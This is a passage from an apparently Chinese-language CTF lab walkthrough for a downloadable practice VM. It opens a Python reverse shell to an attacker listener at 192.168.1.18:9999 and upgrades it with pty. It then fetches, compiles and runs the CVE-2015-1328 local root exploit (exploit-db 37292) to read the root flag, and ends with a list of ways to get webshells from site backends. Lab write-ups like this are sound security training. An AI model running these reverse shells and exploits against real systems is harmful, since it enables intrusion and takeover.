靶场下载链接
【超级会员V5】通过百度网盘分享的文件:1-Golden…
链接:https://pan.baidu.com/s/1O8_GHG-HILZqARcn-W_xYQ?pwd=1tp1
提取码:1tp1
复制这段内容打开「百度网盘APP 即可获取」
1
然后重新
exploit
继续运行:获得
shell
但是方向交互
shell
不正常
;
我们查看
Linux
上面有什么一般有
python
2
执行
tty
,因为获得的权限无框架:执行
3
TTY
是
Teletype
或
Teletypewriter
的缩写,原来是指电传打字机,后来这种设备逐渐键盘和显示器取代。
不管是电传打字机还是键盘显示器,都是作为计算机的终端设备存在的,所以
TTY
也泛指计算机的终端
(terminal)
设备。为了支持这些
TTY
设备,
Linux
实现了一个叫做
TTY
的子系统。
4
python -c 'import pty; pty.spawn("/bin/bash")' ---
将
shell
进行
tty
![](https://i-blog.csdnimg.cn/direct/7a87df370aa94097bbf655666f67fbdd.png)
![](https://i-blog.csdnimg.cn/direct/d68b98b5e2764d79b233d1455106144b.png)
另外一种方法我们也可以在后台执行
python
命令
1
nc -vlp 9999 //
这里在
kali
上面开始监听
2
我们在
admin bookmarks
下面里面有一个路径的地方,找到
python
执行的路径在输入下面命令执行
3
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192
.168.1.18",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
4
在
Home——>Blogs——>Add a new entry——ABC
处触发
5
nc
接收到了相关信息
6
python -c 'import pty; pty.spawn("/bin/bash")' //
在此用
python
连接正常
16
、进行提权获取
flag
1
uname -a //
显示系统名、节点名称、操作系统的发行版号、内核版本等等
2
https://www.exploit-db.com/exploits/37292 //
我们可以去下载提权
CVE-2015-1328
3
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64
x86_64 x86_64 GNU/Linux
4
"cc"
是
Linux
系统中的一个编译器命令,它用于将
C
语言源代码编译成可执行文件。
5
"gcc
是
linux
平台的
C
语言编译器
,
也是一个可执行程序。在
linux
平台也可以编译
arm
平台的可执行程序
,
一般
用交叉编译器
,
如
arm-xx-linux-gcc"
。
6
gcc //
我们这里提示我们安装
7
cc //
这里是报错,那么我们要查找
cc
8
which cc
9
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ which cc
10
which cc
11
/usr/bin/cc
1
kali
搜索下:
2
searchsploit 37292 ---
搜索
kali
本地的
exp
库中
37292
攻击脚本信息
3
cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali ---
目录自行修改
1
我们在查看此机器时发现没有
gcc
,只存在
cc
那么我们要把
37292.c
用
vim
或者
vi
或者
gedit 37292.c
2
用
vim
打开
3
然后
set number
,在
143
行把
gcc
改成
cc
![](https://i-blog.csdnimg.cn/direct/3e27cc09e3ed41a09432959f9230a5c8.png)
![](https://i-blog.csdnimg.cn/direct/4754fa882e5a473683c9a3707f1106ae.png)
然后在本目录下开启
http
服务:
python -m SimpleHTTPServer 8080
或者用
python3 -m http.server 80
wget
http://192.168.1.18:80/37292.c
---wget
下载
http
服务下的文件
我们尽量去
tmp
目录下面去下载然后成功以后可以删除文件,不影响对方服务器
1
cd /tmp
2
www-data@ubuntu:/tmp$ wget http://192.168.0.7:80/37292.c
3
www-data@ubuntu:/tmp$ id
4
uid=33(www-data) gid=33(www-data) groups=33(www-data)
5
www-data@ubuntu:/tmp$ ls -la
6
ls -la
7
total 32
8
drwxrwxrwt 5 root root 4096 Sep 24 04:34 .
9
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
10
drwxrwxrwt 2 root root 4096 Sep 24 00:33 .ICE-unix
11
drwxrwxrwt 2 root root 4096 Sep 24 00:33 .X11-unix
12
-rw-rw-rw- 1 www-data www-data 4968 Sep 24 04:17 37292.c
13
-rw------- 1 www-data www-data 4 Sep 24 03:46 tinyspelllyruch
14
drwx------ 2 root root 4096 Sep 24 00:33 vmware-root
15
www-data@ubuntu:/tmp$
16
成功下载后执行
cc
编译:
17
cc -o exp 37292.c ---C
语言的
CC
代码编译点
c
文件
18
chmod +x exp ---
编译成可执行文件,并赋权
19
./exp ---
点杠执行
20
id ---
查看目前权限
21
ls -la
22
id
23
cat /root/.flag.txt ---
读取
root
下的
flag
信息
24
568628e0d993b1973adc718237da6e93
![](https://i-blog.csdnimg.cn/direct/30ef5616d40a4f138b34db5373f7acd6.png)
注意:如果ls命令无法查找内容时,使用ls -la详细查找即可实现
![](https://i-blog.csdnimg.cn/direct/65cf774f3bf849babaf5deeec7a95bae.png)
常见网站后台拿
webshell
当我们进入网站后台可能要注意的一些地方是那些,那些是我们经常可以拿到
shell
的地方,要进行关
注
1.
模板编辑器拿
webshell
2.
文件上传拿
webshell
3.
ZIP
自解压拿
webshell
4.
远程图片拿
webshell
5.
编辑器拿
webshell
6.
备份文件拿
webshell
7.
SQL
语句拿
webshell
在后台有可能存在注入
图片隐写:参考内容
https://www.freebuf.com/consult/365804.html
https://www.freebuf.com/news/364688.html
https://www.freebuf.com/news/364222.html